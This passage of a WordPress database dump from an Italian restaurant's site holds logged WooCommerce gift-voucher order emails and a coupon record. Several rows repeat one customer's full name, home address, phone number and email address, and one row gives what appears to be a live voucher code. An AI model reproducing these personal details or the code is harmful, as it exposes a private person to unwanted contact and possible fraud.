End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1257) - 28 November 2020','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1257-28-november-2020','','','2020-11-28 15:28:13','2020-11-28 14:28:13','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1257-28-november-2020/',0,'postman_sent_mail','',0),(1259,0,'2020-11-28 15:28:13','2020-11-28 14:28:13','\n\n	\n		\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">You’ve received the following order from Matteo Arlotti:</p>\n\n<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1257&amp;action=edit\" style=\"font-weight: normal;text-decoration: underline;color: #557da1\">[Order #1257]</a> (28 November 2020)</h2>\n\n<div style=\"margin-bottom: 40px\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;width: 100%;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small;margin: 1em 0 0;padding: 0\">\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">To:</strong> <p style=\"margin: 0\">Matteo Arlotti</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">From:</strong> <p style=\"margin: 0\">Matteo Arlotti</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">Message:</strong> <p style=\"margin: 0\">Cena delivery 28-11<br>\nViale Ugo Foscolo 27 - Rimini  47921<br>\n371 3930671</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			<span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\"><span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Total:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\"><span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;vertical-align: top;margin-bottom: 40px;padding: 0\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;border: 0;padding: 0\">\n			<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px;color: #737373;border: 1px solid #e4e4e4\">\n				inclubitalia<br>Matteo Arlotti<br>Viale Ugo Foscolo 27<br>47921<br>Rimini<br>RIMINI									<br><a href=\"tel:3713930671\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">371 3930671</a>													<br>arlostaff@gmail.com							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px\">Congratulations on the sale.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1257) - 28 November 2020','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1257-28-november-2020-2','','','2020-11-28 15:28:13','2020-11-28 14:28:13','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1257-28-november-2020-2/',0,'postman_sent_mail','',0),(1260,0,'2020-11-28 15:28:19','2020-11-28 14:28:19','\n\n	\n		\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Thank you for your order</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Hi Matteo,</p>\n<p style=\"margin: 0 0 16px\">Just to let you know — we\'ve received your order #1257, and it is now being processed:</p>\n\n\n<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>\n	[Order #1257] (28 November 2020)</h2>\n\n<div style=\"margin-bottom: 40px\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;width: 100%;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		Buono Regalo (valore a scelta)<ul class=\"wc-item-meta\" style=\"font-size: small;margin: 1em 0 0;padding: 0\">\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">To:</strong> <p style=\"margin: 0\">Matteo Arlotti</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">From:</strong> <p style=\"margin: 0\">Matteo Arlotti</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">Message:</strong> <p style=\"margin: 0\">Cena delivery 28-11<br>\nViale Ugo Foscolo 27 - Rimini  47921<br>\n371 3930671</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			<span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n			<tr>\n			<td colspan=\"3\" style=\"padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n				<p style=\"margin: 0 0 16px\">Validità 6 mesi dal momento dell\'acquisto</p>\n			</td>\n		</tr>\n		\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\"><span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Total:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\"><span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;vertical-align: top;margin-bottom: 40px;padding: 0\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;border: 0;padding: 0\">\n			<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px;color: #737373;border: 1px solid #e4e4e4\">\n				inclubitalia<br>Matteo Arlotti<br>Viale Ugo Foscolo 27<br>47921<br>Rimini<br>RIMINI									<br><a href=\"tel:3713930671\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">371 3930671</a>													<br>arlostaff@gmail.com							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px\">Thanks for using www.ristorantesolymar.it!</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','Your Sol Y Mar, ristorante a Riccione order has been received!','Incorrect authentication data\r\n','private','closed','closed','','your-sol-y-mar-ristorante-a-riccione-order-has-been-received-3','','','2020-11-28 15:28:19','2020-11-28 14:28:19','',0,'https://www.ristorantesolymar.it/postman_sent_mail/your-sol-y-mar-ristorante-a-riccione-order-has-been-received-3/',0,'postman_sent_mail','',0),(1261,0,'2020-11-28 15:28:19','2020-11-28 14:28:19','\n\n	\n		\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Thank you for your order</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Hi Matteo,</p>\n<p style=\"margin: 0 0 16px\">Just to let you know — we\'ve received your order #1257, and it is now being processed:</p>\n\n\n<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>\n	[Order #1257] (28 November 2020)</h2>\n\n<div style=\"margin-bottom: 40px\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;width: 100%;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		Buono Regalo (valore a scelta)<ul class=\"wc-item-meta\" style=\"font-size: small;margin: 1em 0 0;padding: 0\">\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">To:</strong> <p style=\"margin: 0\">Matteo Arlotti</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">From:</strong> <p style=\"margin: 0\">Matteo Arlotti</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">Message:</strong> <p style=\"margin: 0\">Cena delivery 28-11<br>\nViale Ugo Foscolo 27 - Rimini  47921<br>\n371 3930671</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			<span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n			<tr>\n			<td colspan=\"3\" style=\"padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n				<p style=\"margin: 0 0 16px\">Validità 6 mesi dal momento dell\'acquisto</p>\n			</td>\n		</tr>\n		\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\"><span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Total:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\"><span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;vertical-align: top;margin-bottom: 40px;padding: 0\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;border: 0;padding: 0\">\n			<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px;color: #737373;border: 1px solid #e4e4e4\">\n				inclubitalia<br>Matteo Arlotti<br>Viale Ugo Foscolo 27<br>47921<br>Rimini<br>RIMINI									<br><a href=\"tel:3713930671\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">371 3930671</a>													<br>arlostaff@gmail.com							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px\">Thanks for using www.ristorantesolymar.it!</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','Your Sol Y Mar, ristorante a Riccione order has been received!','Sent ( ** Fallback ** )','private','closed','closed','','your-sol-y-mar-ristorante-a-riccione-order-has-been-received-4','','','2020-11-28 15:28:19','2020-11-28 14:28:19','',0,'https://www.ristorantesolymar.it/postman_sent_mail/your-sol-y-mar-ristorante-a-riccione-order-has-been-received-4/',0,'postman_sent_mail','',0),(1262,0,'2020-11-28 15:28:19','2020-11-28 14:28:19','GIFTCARD ORDER #1257','solymarcouponE5MGX','GIFTCARD ORDER #1257','publish','closed','closed','','solymarcoupone5mgx','','','2020-11-28 15:28:19','2020-11-28 14:28:19','',0,'https://www.ristorantesolymar.it/2020/11/28/solymarcoupone5mgx/',0,'shop_coupon','',0),(1263,0,'2020-11-28 15:28:27','2020-11-28 14:28:27','\n\n\n\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto;background-color: #ff9898;border-spacing: 10px\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;margin: 0 auto;width: 100%;padding: 10px 0px;border: 2px dashed #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0;text-align: left\"><a style=\"font-weight: normal;text-decoration: none;color: #ffffff;margin-left: 10px\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></a></td>\r\n<td style=\"padding: 10px 0;text-align: center\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center;padding: 2px 0px\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n 